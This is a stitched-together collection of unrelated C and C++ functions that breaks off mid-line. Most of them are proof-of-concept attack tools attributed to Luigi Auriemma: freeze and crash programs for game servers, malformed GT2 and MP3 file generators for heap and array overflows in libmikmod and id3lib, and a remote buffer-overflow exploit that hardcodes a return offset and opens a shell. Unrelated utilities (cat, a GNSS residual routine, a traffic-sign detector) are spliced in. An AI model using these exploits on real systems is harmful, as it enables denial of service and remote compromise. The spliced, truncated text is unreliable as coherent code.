int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) { int retry, len; if(in && !out) { if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in)) < 0) std_err(); return(0); } if(in) { for(retry = 2; retry; retry--) { if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in)) < 0) std_err(); if(!timeout(sd, 1)) break; } if(!retry) { if(!err) return(-1); printf("\nError: socket timeout, no reply received\n\n"); exit(1); } } else { if(timeout(sd, 3) < 0) return(-1); } len = recvfrom(sd, out, outsz, 0, NULL, NULL); if(len < 0) std_err(); return(len); }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd; u_short port = PORT; u_char *buff; setbuf(stdout, NULL); fputs("\n" "Pigeon server <= 3.02.0143 freeze "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 2) { printf("\nUsage: %s <server> [port(%d)]\n" "\n", argv[0], PORT); exit(1); } #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("\n- target %s:%hu\n", inet_ntoa(peer.sin_addr), port); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); buff = malloc(BUFFSZ); if(!buff) std_err(); memset(buff, 'a', BUFFSZ); buff[BUFFSZ - 5] = '|'; buff[BUFFSZ - 4] = '|'; buff[BUFFSZ - 3] = '1'; buff[BUFFSZ - 2] = '|'; buff[BUFFSZ - 1] = '|'; fputs("- send malformed data\n", stdout); if(send(sd, buff, BUFFSZ, 0) < 0) std_err(); close(sd); fputs("- the server should be freezed, check it manually\n\n", stdout); return(0); }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd; u_short port = PORT; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif setbuf(stdout, NULL); fputs("\n" "Chris Moneymaker's World Poker Championship 1.0 buffer-overflow "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s <host> [port(%d)]\n" "\n", argv[0], port); exit(1); } if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), port); fputs("- check server: ", stdout); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); if(timeout(sd) < 0) { fputs("\nError: server doesn't seem to work, I have received no data\n\n", stdout); exit(1); } fputs("ok\n", stdout); fputs("- send malformed data size\n", stdout); send_chmpoker(sd, BOF, sizeof(BOF) - 1, 8, 3); sleep(ONESEC); close(sd); fputs("- the server should be crashed, check it manually\n", stdout); return(0); }
int extract_fastfile(char * infilename, char * outfilename) { FILE *fd, *fdo = NULL; uint32_t inlen, outlen; int i, files; char *file_input, *file_output, *file_offset; setbuf(stdout, NULL); setbuf(stderr, NULL); file_input = infilename; file_output = outfilename; file_offset = "0x15"; printf("Extracting fastfile: %s\n", file_input); fd = fopen(file_input, "rb"); if(!fd) std_err(); if(minzip > INSZ) minzip = INSZ; if(minzip < 1) minzip = 1; in = malloc(INSZ); out = malloc(OUTSZ); filebuff = malloc(FBUFFSZ); if(!in || !out || !filebuff) std_err(); offset = get_num(file_offset); // do not skip, needed for buffseek buffseek(fd, offset, SEEK_SET); z.zalloc = (alloc_func)0; z.zfree = (free_func)0; z.opaque = (voidpf)0; if(inflateInit2(&z, zipwbits) != Z_OK) zlib_err(Z_INIT_ERROR); fdo = save_file(file_output); unzip(fd, &fdo, &inlen, &outlen); FCLOSE(fdo) printf("\n" "%u bytes compressed\n" "%u bytes extracted\n", inlen, outlen); FCLOSE(fdo) FCLOSE(fd) inflateEnd(&z); free(in); free(out); free(filebuff); return(0); }
static void report(char *label) { int e = errno; std_err("cat: "); std_err(label); std_err(": "); std_err(strerror(e)); std_err("\n"); excode = 1; }
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err, int z) { static u8 *zbuff = NULL; uLongf len; int retry = 2; if(!zbuff) { zbuff = malloc(ZBUFFSZ); if(!zbuff) std_err(); } if(in) { if(z) { len = ZBUFFSZ; compress2(zbuff, (void *)&len, in, insz, Z_BEST_COMPRESSION); in = zbuff; insz = len; } while(retry--) { fputc('.', stdout); if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in)) < 0) goto quit; if(!out) return(0); if(!timeout(sd, 1)) break; } } else { if(timeout(sd, 3) < 0) retry = -1; } if(retry < 0) { if(!err) return(-1); printf("\nError: socket timeout, no reply received\n\n"); exit(1); } fputc('.', stdout); len = recvfrom(sd, zbuff, ZBUFFSZ, 0, NULL, NULL); if((int)len < 0) goto quit; z = 0; // incoming zlib seems not active for the moment, I leave this stuff here for the future if(z) { if(uncompress(out, (void *)&outsz, zbuff, len) == Z_OK) { len = outsz; } else { memcpy(out, zbuff, len); } } else { memcpy(out, zbuff, len); } return(len); quit: if(err) std_err(); return(-1); }
void scorched3d_send(int sd, u_char *pck, int len, u_char *buff, int buffsz) { int tmp, zlen; zlen = zip(pck, len, buff, buffsz); tmp = htonl(zlen + 4); if(send(sd, (void *)&tmp, 4, 0) < 0) std_err(); tmp = htonl(len); if(send(sd, (void *)&tmp, 4, 0) < 0) std_err(); if(send(sd, buff, zlen, 0) < 0) std_err(); }
void gs_info_udp(u_long ip, u_short port) { struct sockaddr_in peer; int sd, len, nt = 1; u_char buff[2048], *p1, *p2; peer.sin_addr.s_addr = ip; peer.sin_port = htons(port); peer.sin_family = AF_INET; sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); if(sendto(sd, "\\status\\", 8, 0, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); if(timeout(sd) < 0) { fputs("\nError: socket timeout, no replies received. Probably the server doesn't support the Gamespy query protocol or the port is wrong\n\n", stdout); close(sd); exit(1); } len = recvfrom(sd, buff, sizeof(buff) - 1, 0, NULL, NULL); if(len < 0) std_err(); buff[len] = 0x00; p1 = buff; while((p2 = strchr(p1, '\\'))) { *p2 = 0x00; if(!nt) { if(!*p1) break; printf("%30s: ", p1); nt++; } else { printf("%s\n", p1); nt = 0; } p1 = p2 + 1; } printf("%s\n\n", p1); close(sd); }
int main(int argc, char *argv[]) { FILE *fd; gt2_t gt2; int i; char *fname; setbuf(stdout, NULL); fputs("\n" "libmikmod <= 3.2.2 and current CVS heap overflow with GT2 files "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: aluigi.org\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s <output_file.GT2>\n" "\n", argv[0]); exit(1); } fname = argv[1]; printf("- create file %s\n", fname); fd = fopen(fname, "wb"); if(!fd) std_err(); gt2.gt2[0] = 'G'; gt2.gt2[1] = 'T'; gt2.gt2[2] = '2'; gt2.version = 4; gt2.chunk_size = 0; // unused cpy(gt2.module, "module_name"); cpy(gt2.comments, "author"); gt2.date_day = 1; gt2.date_month = 1; gt2.date_year = 2006; cpy(gt2.tracker, "tracker"); gt2.speed = 6; gt2.tempo = 300; gt2.volume = 0; gt2.voices = 0; printf("- write GT2 header\n"); fwrite(>2, sizeof(gt2), 1, fd); for(i = 0; i < gt2.voices; i++) fwi16(fd, 0); printf("- build the XCOM header for exploiting the heap overflow\n"); fwmem(fd, "XCOM", 4); fwi32(fd, 0); // unused fwi32(fd, 0xffffffff); // bug here, 0xffffffff + 1 = 0 fwstr(fd, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"); fclose(fd); printf("- finished\n"); return(0); }
u8 *wtcc_encrypt(u8 *filebuff, int filelen, int *retlen, int filever) { uLongf zlen; u32 //zlen, bflen, keylen = 0, keytable = 0; int dozip = 0; u8 *buff, *key = NULL; zlen = filelen + (filelen / 1000) + 12; // must be at least 0.1% larger than sourceLen plus 12 bytes buff = malloc(16 + zlen); if(!buff) std_err(NULL); printf("- XOR %u bytes with 0xeb\n", filelen); xor(filebuff, filelen, 0xeb); key = wtcc_filever_key(1, filever, &keylen, &keytable, &dozip); if(customkey) { key = customkey; keylen = customkeylen; } if(dozip) { printf("- zip %u bytes\n", filelen); zlen = filelen; compress2(buff + 16, &zlen, filebuff, filelen, Z_BEST_COMPRESSION); bflen = zlen; } else { zlen = 0; memcpy(buff + 16, filebuff, filelen); bflen = filelen; } bflen = (bflen + 7) & ~7; printf("- encrypt %u bytes\n", bflen); wtcc_blowfish(key, keylen, keytable, buff + 16, bflen, BF_ENCRYPT); printf( "- file version %u\n" "- blowfish size %u (%s)\n" "- compressed size %u\n" "- data size %u\n", filever, bflen, (bflen & 7) ? "wrong" : "correct", (u32)zlen, filelen); put32(buff, 0xffffb10f); put32(buff + 4, filever); put32(buff + 8, filelen); put32(buff + 12, zlen); *retlen = 16 + bflen; return(buff); }
void read_sock(int sd, u_char *buff, int max) { int t; while(max) { t = recv(sd, buff, max, 0); if(t <= 0) std_err(); max -= t; } }
u_char *do_it_big(int size) { u_char *s; s = malloc(size + 1); if(!s) std_err(); memset(s, 'a', size); s[size] = 0; return(s); }
int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err) { int retry, len; for(retry = 3; retry; retry--) { if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); if(!timeout(sd)) break; } if(!retry) { if(!err) return(-1); fputs("\nError: socket timeout, no reply received\n\n", stdout); exit(1); } len = recvfrom(sd, out, outsz, 0, NULL, NULL); if(len < 0) std_err(); return(len); }
int main(int argc, char *argv[]) { FILE *fd, *fdo; u8 *fin, *fout; fputs("QuakeLive PK3 decrypter "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: aluigi.org\n" "\n", stdout); if(argc < 3) { printf("\n" "Usage:\n" " %s <infile> <outfile>\n" "\n" "Example:\n" " %s encrypted/quakelive-map.pk3 decrypted/some-map.pk3\n" "\n", argv[0], argv[0]); exit(1); } fin = argv[1]; fout = argv[2]; printf("- open %s\n", fin); fd = fopen(fin, "rb"); if(!fd) std_err(); printf("- create %s\n", fout); if(check_overwrite(fout) < 0) exit(1); fdo = fopen(fout, "wb"); if(!fdo) std_err(); quakelive_decrypt(fd, fdo); fclose(fd); fclose(fdo); printf("- done\n"); return(0); }
u8 *fd_read(u8 *name, int *fdlen) { struct stat xstat; FILE *fd; int len, memsize, filesize; u8 *buff; if(!strcmp(name, "-")) { printf("- open %s\n", "stdin"); filesize = 0; memsize = 0; buff = NULL; for(;;) { if(filesize >= memsize) { memsize += 0x80000; buff = realloc(buff, memsize); if(!buff) std_err(); } len = fread(buff + filesize, 1, memsize - filesize, stdin); if(!len) break; filesize += len; } buff = realloc(buff, filesize); if(!buff) std_err(); } else { printf("- open file \"%s\"\n", name); fd = fopen(name, "rb"); if(!fd) std_err(); fstat(fileno(fd), &xstat); filesize = xstat.st_size; buff = malloc(filesize); if(!buff) std_err(); fread(buff, filesize, 1, fd); fclose(fd); } *fdlen = filesize; return(buff); }
int timeout(int sock, int secs) { struct timeval tout; fd_set fd_read; int err; tout.tv_sec = secs; tout.tv_usec = 1000; // in case secs is 0 FD_ZERO(&fd_read); FD_SET(sock, &fd_read); err = select(sock + 1, &fd_read, NULL, NULL, &tout); if(err < 0) std_err(); if(!err) return(-1); return(0); }
int timeout(int sock) { struct timeval tout; fd_set fd_read; int err; tout.tv_sec = TIMEOUT; tout.tv_usec = 0; FD_ZERO(&fd_read); FD_SET(sock, &fd_read); err = select(sock + 1, &fd_read, NULL, NULL, &tout); if(err < 0) std_err(); if(!err) return(-1); return(0); }
u8 *fd_read(u8 *name, int *fdlen) { struct stat xstat; FILE *fd; u8 *buff; printf("- open file %s\n", name); fd = fopen(name, "rb"); if(!fd) std_err(NULL); fstat(fileno(fd), &xstat); buff = malloc(xstat.st_size); fread(buff, xstat.st_size, 1, fd); fclose(fd); *fdlen = xstat.st_size; return(buff); }
static void output(char *buf, size_t count) { ssize_t n; while (count > 0) { n = write(STDOUT_FILENO, buf, count); if (n <= 0) { if (n < 0) fatal(STDOUT); std_err("cat: standard output: EOF\n"); exit(1); } buf += n; count -= n; } }
void fd_write(u_char *name, u_char *data, int datasz) { FILE *fd; printf("- create file %s\n", name); fd = fopen(name, "rb"); if(fd) { fclose(fd); printf("- file already exists, do you want to overwrite it (y/N)?\n "); fflush(stdin); if(tolower(fgetc(stdin)) != 'y') exit(1); } fd = fopen(name, "wb"); if(!fd) std_err(); fwrite(data, datasz, 1, fd); fclose(fd); }
int main(int argc, char *argv[]) { int i, fd; i = 1; while (i < argc && argv[i][0] == '-') { char *opt = argv[i] + 1; if (opt[0] == 0) break; /* - */ i++; if (opt[0] == '-' && opt[1] == 0) break; /* -- */ while (*opt != 0) switch (*opt++) { case 'u': unbuffered = 1; break; default: std_err("Usage: cat [-u] [file ...]\n"); exit(1); } } if (i >= argc) { copyout(STDIN, STDIN_FILENO); } else { while (i < argc) { char *file = argv[i++]; if (file[0] == '-' && file[1] == 0) { copyout(STDIN, STDIN_FILENO); } else { fd = open(file, O_RDONLY); if (fd < 0) { report(file); } else { copyout(file, fd); close(fd); } } } } output(obuf, (op - obuf)); return(excode); }
int main(int argc, char *argv[]) { FILE *fd; int i; u8 buff[1024], *p; setbuf(stdout, NULL); fputs("\n" "id3lib (devel CVS) array overflow "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: aluigi.org\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s <output.MP3>\n" "\n", argv[0]); exit(1); } p = buff; *p++ = 'I'; // "ID3" *p++ = 'D'; *p++ = '3'; *p++ = 4; // ID3v2 4.0 *p++ = 0; *p++ = 1 << 6; // flags: extended p += w28(p, 0); // this->SetDataSize p += w28(p, 0); // not used by id3lib *p++ = 6; // extflagbytes for(i = 0; i < 20; i++) { *p++ = 0xcc; } printf("- create file %s\n", argv[1]); fd = fopen(argv[1], "wb"); if(!fd) std_err(); fwrite(buff, 1, p - buff, fd); fclose(fd); printf("- done\n"); return(0); }
/* ionosphere residuals ------------------------------------------------------*/ static int res_iono(const obsd_t *obs, int n, const double *azel, const double *x, int nx, double *v, double *H, double *R) { double *sig,L1,L2,P1,P2,map; int i,j,nv=0,sat; sig=mat(1,2*n); for (i=0;i<n;i++) { sat=obs[i].sat; L1=obs->L[0]*lam[0]; L2=obs->L[1]*lam[1]; P1=obs->P[0]; P2=obs->P[1]; if (L1==0||L2==0||P1==0||P2==0) continue; /* ionosphere mapping function */ map=ionmapf(pos,azel+i*2); /* residuals of ionosphere (geometriy-free) LC */ v[nv ]=(L1-L2)+map*x[II(sat)]-x[IB(sat)]; v[nv+1]=(P1-P2)-map*x[II(sat)]; /* partial derivatives */ for (j=0;j<nx;j++) H[nx*nv+j]=0.0; H[nx*nv +II(sat)]=-map; H[nx*nv +IB(sat)]=1.0; H[nx*(nv+1)+IB(sat)]=map; /* standard deviation of error */ sig[nv ]=std_err(azel); sig[nv+1]=sig[nv]*RATIO_ERR; nv+=2; } for (i=0;i<nv;i++) for (j=0;j<nv;j++) { R[i+j*nv]=i==j?SQR(sig[i]):0.0; } free(sig); return nv; }
void fd_write(u8 *name, u8 *data, int datasz) { FILE *fd; u8 ans[16]; name = create_dir(name); printf("- create file %s\n", name); if(!overwrite) { fd = fopen(name, "rb"); if(fd) { fclose(fd); printf("- file already exists, do you want to overwrite it (y/N/all)?\n "); fflush(stdin); fgets(ans, sizeof(ans), stdin); if(ans[0] == 'a') overwrite = 1; else if(ans[0] != 'y') exit(1); // terminate immediately } } fd = fopen(name, "wb"); if(!fd) std_err(NULL); fwrite(data, datasz, 1, fd); fclose(fd); }
u8 *create_dir(u8 *name) { struct stat xstat; int n, namelen; u8 *p; namelen = strlen(name); p = strchr(name, ':'); if(p) { p++; } else { p = name; } if((*p == '/') || (*p == '\\')) p++; for(; (p - name) < namelen; p++) { n = strcspn(p, "/\\"); if(!n) continue; p += n; if(!*p) continue; *p = 0; if(stat(name, &xstat) < 0) { printf("- create folder %s\n", name); MAKEDIR(name); } else if(!S_ISDIR(xstat.st_mode)) { printf("\nError: %s is not a folder\n", name); std_err(""); } *p = PATHSLASH; } return(name); }
int main(int argc, char *argv[]) { unsigned char buffrecv[BUFFSZ], buffsend[sizeof(BOF1) + 64], challenge[16], bug, *bofstr, *stri, *strf; struct sockaddr_in peer; int sd, err, rlen, bufflen, proto; unsigned long offset; setbuf(stdout, NULL); if(argc < 2) { printf("\nUsage: %s <host> <port>\n\n", argv[0], PORT); exit(1); } printf("OK team, follow my command.\n"); srand(time(NULL)); bofstr=BOF1; peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(atoi(argv[2])); // offset=strtoul(argv[3],NULL,16); peer.sin_family = AF_INET; rlen = sizeof(peer); offset=0x0804AE93; // call eax printf("Using offset 0x%08x...\n",offset); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); /* GET INFORMATIONS */ err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, rlen); if(err < 0) std_err(); err = timeout2(sd); if(err < 0) { fputs("\nError: socket timeout\n", stdout); exit(1); } err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen); if(err < 0) std_err(); buffrecv[err] = 0x00; proto = getproto(buffrecv); showinfostring(buffrecv, err); /* GET CHALLENGE NUMBER */ err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&peer, rlen); if(err < 0) std_err(); err = timeout2(sd); if(err < 0) { fputs("\nError: socket timeout\n", stdout); exit(1); } err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen); if(err < 0) std_err(); buffrecv[err] = 0x00; stri = strchr(buffrecv, 0x20); if(!stri) stri = buffrecv; strf = strchr(stri + 1, 0x20); if(!strf) strf = buffrecv + err; *strf = 0x00; strncpy(challenge, stri, 16); printf("Challenge: %s\n", challenge); bufflen = snprintf(buffsend, sizeof(BOF1) + 64, bofstr, proto, challenge, (long)(rand() << 1) + (rand() & 0xf), /* 31bit */ (long)(rand() << 1) + (rand() & 0xf), (long)(rand() << 1) + (rand() & 0xf), (long)(rand() << 1) + (rand() & 0xf), offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF, offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF, offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF); if(bufflen < 0) { fputs("\nError: cannot allocate buffer in memory\n", stdout); exit(1); } printf("Sending deadly packet ... stand by\n"); err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&peer, rlen); if(err < 0) std_err(); err = timeout2(sd); if(err < 0) { fputs("\nResult: The remote server IS vulnerable!!!\n", stdout); exec_sh(connect_sh(argv[1])); return(0); } err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen); if(err < 0) std_err(); buffrecv[err] = 0x00; printf("Connect: %s\n", buffrecv + 5); close(sd); fputs("\nResult: The server doesn't seems to be vulnerable\n\n", stdout); return(0); }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd; u_short port = PORT; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif setbuf(stdout, NULL); fputs("\n" "Netpanzer <= 0.8 endless loop "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s <host> [port(%d)]\n" "\n", argv[0], port); exit(1); } if(argc > 2) port = atoi(argv[2]); peer.sin_addr.s_addr = resolv(argv[1]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), port); fputs("- check server: ", stdout); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); if(timeout(sd) < 0) { fputs("\nError: server doesn't seem to work, I have received no data\n\n", stdout); exit(1); } else { fputs("ok\n", stdout); } fputs("- send malformed data size\n", stdout); if(send(sd, "\x00\x00", 2, 0) <= 0) std_err(); close(sd); fputs("- check server status:\n", stdout); sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(sd < 0) std_err(); if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err(); if(timeout(sd) < 0) { fputs("\nServer IS vulnerable!!!\n\n", stdout); } else { fputs("\nServer doesn't seem vulnerable\n\n", stdout); } close(sd); return(0); }
//TODO: code here should be abstracted outside the app, modify tests accordingly int main(int argc, char *argv[]) { // Chec the number of arguments if (argc != 2) { std::cout << "********************************" << std::endl; std::cout << "Usage of the code: ./traffic-sign-detection imageFileName.extension" << std::endl; std::cout << "********************************" << std::endl; return -1; } // Clock for measuring the elapsed time std::chrono::time_point<std::chrono::system_clock> start, end; start = std::chrono::system_clock::now(); // Read the input image - convert char* to string std::string input_filename(argv[1]); // Read the input image cv::Mat input_image = cv::imread(input_filename); // Check that the image has been opened if (!input_image.data) { std::cout << "Error to read the image. Check ''cv::imread'' function of OpenCV" << std::endl; return -1; } // Check that the image read is a 3 channels image CV_Assert(input_image.channels() == 3); /* * Conversion of the image in some specific color space */ // Conversion of the rgb image in ihls color space cv::Mat ihls_image; colorconversion::convert_rgb_to_ihls(input_image, ihls_image); // Conversion from RGB to logarithmic chromatic red and blue std::vector< cv::Mat > log_image; colorconversion::rgb_to_log_rb(input_image, log_image); /* * Segmentation of the image using the previous transformation */ // Segmentation of the IHLS and more precisely of the normalised hue channel // ONE PARAMETER TO CONSIDER - COLOR OF THE TRAFFIC SIGN TO DETECT - RED VS BLUE int nhs_mode = 0; // nhs_mode == 0 -> red segmentation / nhs_mode == 1 -> blue segmentation cv::Mat nhs_image_seg_red; segmentation::seg_norm_hue(ihls_image, nhs_image_seg_red, nhs_mode); //nhs_mode = 1; // nhs_mode == 0 -> red segmentation / nhs_mode == 1 -> blue segmentation //cv::Mat nhs_image_seg_blue; cv::Mat nhs_image_seg_blue = nhs_image_seg_red.clone(); //segmentation::seg_norm_hue(ihls_image, nhs_image_seg_blue, nhs_mode); // Segmentation of the log chromatic image // TODO - DEFINE THE THRESHOLD FOR THE BLUE TRAFFIC SIGN. FOR NOW WE AVOID THE PROCESSING FOR BLUE SIGN AND LET ONLY THE OTHER METHOD TO TAKE CARE OF IT. cv::Mat log_image_seg; segmentation::seg_log_chromatic(log_image, log_image_seg); /* * Merging and filtering of the previous segmentation */ // Merge the results of previous segmentation using an OR operator // Pre-allocation of an image by cloning a previous image cv::Mat merge_image_seg_with_red = nhs_image_seg_red.clone(); cv::Mat merge_image_seg = nhs_image_seg_blue.clone(); cv::bitwise_or(nhs_image_seg_red, log_image_seg, merge_image_seg_with_red); cv::bitwise_or(nhs_image_seg_blue, merge_image_seg_with_red, merge_image_seg); // Filter the image using median filtering and morpho math cv::Mat bin_image; imageprocessing::filter_image(merge_image_seg, bin_image); cv::imwrite("seg.jpg", bin_image); /* * Extract candidates (i.e., contours) and remove inconsistent candidates */ std::vector< std::vector< cv::Point > > distorted_contours; imageprocessing::contours_extraction(bin_image, distorted_contours); /* * Correct the distortion for each contour */ // Initialisation of the variables which will be returned after the distortion. These variables are linked with the transformation applied to correct the distortion std::vector< cv::Mat > rotation_matrix(distorted_contours.size()); std::vector< cv::Mat > scaling_matrix(distorted_contours.size()); std::vector< cv::Mat > translation_matrix(distorted_contours.size()); for (unsigned int contour_idx = 0; contour_idx < distorted_contours.size(); contour_idx++) { rotation_matrix[contour_idx] = cv::Mat::eye(3, 3, CV_32F); scaling_matrix[contour_idx] = cv::Mat::eye(3, 3, CV_32F); translation_matrix[contour_idx] = cv::Mat::eye(3, 3, CV_32F); } // Correct the distortion std::vector< std::vector< cv::Point2f > > undistorted_contours; imageprocessing::correction_distortion(distorted_contours, undistorted_contours, translation_matrix, rotation_matrix, scaling_matrix); // Normalise the contours to be inside a unit circle std::vector<double> factor_vector(undistorted_contours.size()); std::vector< std::vector< cv::Point2f > > normalised_contours; initopt::normalise_all_contours(undistorted_contours, normalised_contours, factor_vector); std::vector< std::vector< cv::Point2f > > detected_signs_2f(normalised_contours.size()); std::vector< std::vector< cv::Point > > detected_signs(normalised_contours.size()); // For each contours for (unsigned int contour_idx = 0; contour_idx < normalised_contours.size(); contour_idx++) { // For each type of traffic sign /* * sign_type = 0 -> nb_edges = 3; gielis_sym = 6; radius * sign_type = 1 -> nb_edges = 4; gielis_sym = 4; radius * sign_type = 2 -> nb_edges = 12; gielis_sym = 4; radius * sign_type = 3 -> nb_edges = 8; gielis_sym = 8; radius * sign_type = 4 -> nb_edges = 3; gielis_sym = 6; radius / 2 */ Timer tmrSgnType("For signType"); optimisation::ConfigStruct_<double> final_config; double best_fit = std::numeric_limits<double>::infinity(); //int type_sign_to_keep = 0; for (int sign_type = 0; sign_type < 5; sign_type++) { Timer tmrIteration(" for_signType_iter"); // Check the center mass for a contour cv::Point2f mass_center = initopt::mass_center_discovery(input_image, translation_matrix[contour_idx], rotation_matrix[contour_idx], scaling_matrix[contour_idx], normalised_contours[contour_idx], factor_vector[contour_idx], sign_type); // Find the rotation offset double rot_offset = initopt::rotation_offset(normalised_contours[contour_idx]); // Declaration of the parameters of the gielis with the default parameters optimisation::ConfigStruct_<double> contour_config; // Set the number of symmetry int gielis_symmetry = 0; switch (sign_type) { case 0: gielis_symmetry = 6; break; case 1: gielis_symmetry = 4; break; case 2: gielis_symmetry = 4; break; case 3: gielis_symmetry = 8; break; case 4: gielis_symmetry = 6; break; } contour_config.p = gielis_symmetry; // Set the rotation matrix contour_config.theta_offset = rot_offset; // Set the mass center contour_config.x_offset = mass_center.x; contour_config.y_offset = mass_center.y; Timer tmrOpt("\t for_signType_gielisOptimization"); // Go for the optimisation Eigen::Vector4d mean_err(0,0,0,0), std_err(0,0,0,0); optimisation::gielis_optimisation(normalised_contours[contour_idx], contour_config, mean_err, std_err); mean_err = mean_err.cwiseAbs(); double err_fit = mean_err.sum(); if (err_fit < best_fit) { best_fit = err_fit; final_config = contour_config; //type_sign_to_keep = sign_type; } } Timer tmr2("Reconstruct contour"); // Reconstruct the contour std::cout << "Contour #" << contour_idx << ":\n" << final_config << std::endl; std::vector< cv::Point2f > gielis_contour; int nb_points = 1000; optimisation::gielis_reconstruction(final_config, gielis_contour, nb_points); std::vector< cv::Point2f > denormalised_gielis_contour; initopt::denormalise_contour(gielis_contour, denormalised_gielis_contour, factor_vector[contour_idx]); std::vector< cv::Point2f > distorted_gielis_contour; imageprocessing::inverse_transformation_contour(denormalised_gielis_contour, distorted_gielis_contour, translation_matrix[contour_idx], rotation_matrix[contour_idx], scaling_matrix[contour_idx]); // Transform to cv::Point to show the results std::vector< cv::Point > distorted_gielis_contour_int(distorted_gielis_contour.size()); for (unsigned int i = 0; i < distorted_gielis_contour.size(); i++) { distorted_gielis_contour_int[i].x = (int) std::round(distorted_gielis_contour[i].x); distorted_gielis_contour_int[i].y = (int) std::round(distorted_gielis_contour[i].y); } detected_signs_2f[contour_idx] = distorted_gielis_contour; detected_signs[contour_idx] = distorted_gielis_contour_int; } end = std::chrono::system_clock::now(); std::chrono::duration<double> elapsed_seconds = end-start; std::time_t end_time = std::chrono::system_clock::to_time_t(end); std::cout << "Finished computation at " << std::ctime(&end_time) << "Elapsed time: " << elapsed_seconds.count()*1000 << " ms\n"; cv::Mat output_image = input_image.clone(); cv::Scalar color(0,255,0); cv::drawContours(output_image, detected_signs, -1, color, 2, 8); cv::namedWindow("Window", CV_WINDOW_AUTOSIZE); cv::imshow("Window", output_image); cv::waitKey(0); return 0; }
int main(int argc, char *argv[]) { struct sockaddr_in peer; int sd, len; u_short port = PORT; u_char buff[BUFFSZ], info[] = "\x7f" "\x01\x00" "\x00\x07", pck[] = "\x7f" "\x00\x00" "\x00\x00" "\x00", *p; setbuf(stdout, NULL); fputs("\n" "Scrapland <= 1.0 server termination "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: http://aluigi.altervista.org\n" "\n", stdout); if(argc < 3) { printf("\n" "Usage: %s <attack> <host> [port(%d)]\n" "\n" "Attack:\n" " 1 = big text string (size>SSize)\n" " 2 = unexistent models (you can test this bug also modifying scrap.cfg)\n" " 3 = newpos<=size\n" " 4 = partial packet after small packet (1 or 2 bytes)\n" "\n", argv[0], port); exit(1); } #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif if(argc > 3) port = atoi(argv[3]); peer.sin_addr.s_addr = resolv(argv[2]); peer.sin_port = htons(port); peer.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), port); fputs("- request informations\n", stdout); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); SEND(info, sizeof(info) - 1); RECV; printf("\n Server name %s\n", buff + 10); printf(" Players %d / %d\n\n", *(u_short *)(buff + 8), *(u_short *)(buff + 6)); if(*(u_short *)(buff + 8) == *(u_short *)(buff + 